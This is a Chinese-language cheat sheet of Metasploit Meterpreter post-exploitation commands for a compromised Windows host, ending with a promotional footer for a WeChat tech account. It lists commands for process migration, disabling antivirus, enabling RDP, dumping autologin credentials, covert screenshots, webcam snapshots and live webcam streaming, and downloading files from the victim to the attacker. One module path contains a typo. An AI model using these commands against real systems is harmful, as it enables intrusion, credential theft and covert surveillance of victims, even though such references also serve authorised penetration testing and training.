# Metasploit-Meterpreter-Shell信息收集相关的命令

PS:以下所有的命令都是在Metasploit-Meterpreter Shell下执行的。

# 进程迁移

1、获取目标机正在运行的进程

ps
1

2.查看Meterpreter Shell的进程号

getpid
1

3.将Meterpreter Shell进程绑定到其他进程中

migrate 要绑定到的进程id号
1

4.系统自动寻找合适的进程迁移

run post/windows/manage/migrate
1

# 系统命令

1.查看目标机的系统信息

sysinfo
1

2.查看目标机是否运行在虚拟机上

run post/windows/gather/checkvm
1

3.查看目标机最近的运行时间

idletime
1

4.查看目标机完整的网路设置

route
1

5.将当前会话放到后台

background
1

6.查看目标机器上已经渗透成功的用户名

getuid
1

7.关闭目标机杀毒软件

run post/windows/manage/killav
1

8.启动目标机的远程桌面协议

run post/windows/manage/enable_rdp
1

9.查看目标机的本地子网情况

run post/windows/manage/autoroute
1

10.列举当前有多少用户登录了目标机

run post/windows/gather/enum_logged_on_users
1

11.列举安装在目标机上的应用程序

run post/windows/gather/enum_applications
1

12.抓取目标机自动登录的用户名和密码

run post/windows/gather/credentials/windows)autologin
1

13.抓取目标机屏幕截图

load espia
screengrab
1
2

或者

screenshot
1

14.查看目标机有没有摄像头

webcam_list
1

15.打开目标机摄像头拍照

webcam_snap
1

此命令会将目标机摄像头拍照的图片,以图片的形式保存在攻击机的/root目录下

16.开启摄像头直播模式

webcam_stream
1

此命令会将目标机摄像头录制的视频,以html文件的形式保存在攻击机的/root目录下

17.进行目标机shell

shell
1

18.停止Meterpreter会话或者停止Shell会话返回Meterpreter

exit
1

# 文件系统命令

1.查看当前处于目标机的哪个目录

pwd或getwd
1

2.查看当前处于本地的哪个目录

getlwd
1

3.列举目标机当前目录中的所有文件

ls
1

4.切换目标机目录

cd
1

5.搜索C盘所有以.txt为扩展名的文件

search -f *.txt -d c:\
1

其中,-f参数用于执行搜索文件模式,-d参数用于指定在哪个目录下进行搜索

6.下载目标机C盘的test.txt文件到攻击机/root下

download c:\test.txt /root
1

7.上传攻击机root目录下的test.txt文件到目标机C盘下

upload /root/test.txt c:\
1

# 写在最后

如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!